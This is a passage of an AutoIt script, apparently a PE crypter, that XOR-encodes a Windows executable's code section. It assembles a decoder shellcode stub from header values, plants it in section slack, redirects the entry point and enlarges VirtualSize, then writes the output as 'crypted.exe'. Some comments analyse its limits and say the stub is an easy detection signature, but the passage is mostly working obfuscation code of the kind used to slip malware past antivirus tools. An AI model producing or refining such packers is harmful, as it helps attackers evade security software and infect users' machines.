If IsArray($aIB) = True Then
$sIB_1 = $aIB[2] & $aIB[1]
$sIB_2 = $aIB[4] & $aIB[3]
$hImageBase = "0x" & $sIB_2 & $sIB_1
;MsgBox(0,"ImageBase",$hImageBase)
EndIf
; + Convert Autoit pEndOfCode to hexadecimal
; Back from text position to file offset ((p - 3) / 2), then to an RVA by adding
; VirtualAddress - PointerToRawData. Low 16-bit halves only, as in step 3.
$dVirtualOffset = dec($sVO_1)
$dRawOffset = dec($sRO_1)
$dEndOfCode = ($pEndOfCode - 3) / 2
$dEndOfCode = $dEndOfCode + $dVirtualOffset - $dRawOffset
$hEndOfCode = _Dec2Hex($dEndOfCode)
;MsgBox(0,"EndOfCode Pointer",$hEndOfCode & " hex or " & $dEndOfCode & " dez")
; and split it for XOR shellcode
; $EOC1 / $EOC2 = low / high byte of the 16-bit RVA, i.e. the value in little-endian order.
$EOC1 = StringRight ($hEndOfCode, 2)
$EOC2 = StringMid ($hEndOfCode, 1, 2)
;MsgBox(0, "", $EOC1 & " & " & $EOC2 )
; ##################################################################################################
; #### 5c. Create assembler shellcode with the needed values from Fileheader
; ##################################################################################################
; ASM codes
;
; B8 00104000 MOV EAX,00401000 ; Move start address to EAX
; 8030 DE XOR BYTE PTR DS:[EAX],0DE ; XOR one byte
; 40 INC EAX ; Increase Eax +1
; 3D A8644000 CMP EAX,004064A8 ; Compare start address (EAX) with end of address
; 72 F5 JB SHORT 004064AD ; If EAX != end address, jump back to xor (loop)
; EB CE JMP SHORT ModuleEntryPoint ; If EAX = end address,jump to original entrypoint
; Each 32-bit immediate is assembled little-endian from a 16-bit low half ($aVO[1] & $aVO[2]
; is VirtualAddress in file order; $EOC1 & $EOC2 is the end RVA) plus the upper two bytes of
; ImageBase ($aIB[3] & $aIB[4]). The stub therefore assumes the low word of ImageBase is
; zero and that both RVAs fit in 16 bits. The "72F5" and "EBCE" displacements are constants
; and are not derived from the header values. Apart from the two 16-bit operands and the key
; byte the stub is a fixed 18-byte sequence, which makes it a straightforward static
; signature for detection.
$cMOV_EAX_Start = "B8" & $aVO[1] & $aVO[2] & $aIB[3] & $aIB[4]
$cXOR_Key = "8030" & $hKeyb
$cINC_EAX = "40"
$cCMP_EAX_End = "3D" & $EOC1 & $EOC2 & $aIB[3] & $aIB[4]
$cJB = "72F5"
$cJMP = "EBCE"
$sASM_XORdecode = $cMOV_EAX_Start & $cXOR_Key & $cINC_EAX & $cCMP_EAX_End & $cJB & $cJMP
ConsoleWrite("+ Created shellcode = " & $sASM_XORdecode & @CRLF)
; ##################################################################################################
; #### 5d. Write shellcode into codevave
; ##################################################################################################
; Overwrites the 36 hex characters (18 bytes) at the old end-of-code position with the stub,
; using StringReplace in its start-position form. Nothing checks that the slack is large
; enough or unused; _ZeroCheck below exists for that purpose but is never called.
$sBin = StringReplace($sBin, $pEndOfCode, $sASM_XORdecode)
; ##################################################################################################
; #### 6. Fix new entrypoint and VirtualSize in FileHeader
; ##################################################################################################
; Fix Entrypoint
; Only the low 16 bits of AddressOfEntryPoint are overwritten (2 bytes at $pEntryPoint);
; the high word keeps its previous value. After this, the entry point lies in what used to
; be section slack, one of the header-level traces this leaves.
$iNewEntrypoint = $EOC1 & $EOC2
$sBin = StringReplace($sBin,$pEntryPoint,$iNewEntrypoint,1)
_Entrypoint() ; read again
ConsoleWrite("+ Set new Entrypoint in fileheader to " & $hEntryPoint &@CRLF)
; Shellcode size
$StringLen = StringLen($sASM_XORdecode)
$bLen = $StringLen / 2 ; get byte size
; VirtualSize
; Rebuilt without the "0x" prefix for dec(), then grown by the stub size so the loader maps
; the bytes written into the slack. Hex(..., 4) keeps only the low 16 bits, and only those
; two bytes are written back to the header.
$hVirtualSize = $sVZ_2 & $sVZ_1
$dVirtualSize = dec($hVirtualSize)
$dNewVirtualSize = $dVirtualSize + $bLen
$hNewVirtualSize = Hex(int($dNewVirtualSize),4)
; split
$hNVZ1 = StringRight ($hNewVirtualSize, 2)
$hNVZ2 = StringMid ($hNewVirtualSize, 1, 2)
$sIndiVirtualSize = $hNVZ1 & $hNVZ2
;MsgBox(0,"LitleIndian VirtualSize", $sIndiVirtualSize )
$sNewBin = StringReplace ( $sBin, $pVirtualSize ,$sIndiVirtualSize , 1 )
$sBin = $sNewBin
_VirtualSize()
ConsoleWrite("+ Set new VirtualSize in fileheader to " & $hVirtualSize & @CRLF )
; ##################################################################################################
; #### 7. Write new file on HDD
; ##################################################################################################
; Output always goes to crypted.exe next to the script (mode 2 = overwrite). binary() turns
; the hex text back into bytes. Each error is reported but does not stop the script.
$sNewName = @ScriptDir & "\crypted.exe"
$hFile2 = FileOpen($sNewName ,2)
If @error = True Then MsgBox(0,"Error","FileOpen") EndIf
FileWrite($hFile2, binary($sBin))
If @error = True Then MsgBox(0,"Error","FileWrite") EndIf
FileClose($hFile2)
If @error = True Then MsgBox(0,"Error","FileClose") EndIf
MsgBox(0,"File", "done!")
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
#region
; FUNCS
; Returns 1 if the byte two hex characters before text position $i in the global $sBin is
; 00, 0 if it is anything else, and nothing (the default return) if the regex finds no
; match. Not called anywhere in this script.
Func _ZeroCheck($i)
$i = $i - 2
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
If $aPointer[0] = "00" Then
return 1
Else
return 0
EndIf
EndIf
EndFunc
; XORs the single byte (two hex characters) at text position $i of the global $sBin with
; $hKey and writes the two uppercase result characters back in place, using StringReplace
; in its start-position form. AutoIt binds an undeclared assignment inside a Func to an
; existing Global of the same name, so the script-level $sBin is what gets updated.
; Silently does nothing if the regex finds no match at $i.
Func _XOR($i,$hKey)
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
$bHex = "0x" & $aPointer[0]
$dRet = BitXOR($bHex, $hKey)
$hRet = Hex(int($dRet),2)
$sBin = StringReplace ($sBin, $i,$hRet, -1 )
EndIf
EndFunc
; convert to hex
; Formats an integer as exactly four uppercase hex characters (16 bits; higher bits are
; dropped by Hex's length argument). The intermediate $Ret is not declared Local.
Func _Dec2Hex($iDezPosi)
local $iHex_Posi = Hex(int($iDezPosi),4 ) ; 4 = size
$Ret = $iHex_Posi
return $Ret
EndFunc
#endregion
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
[/LENGUAJE]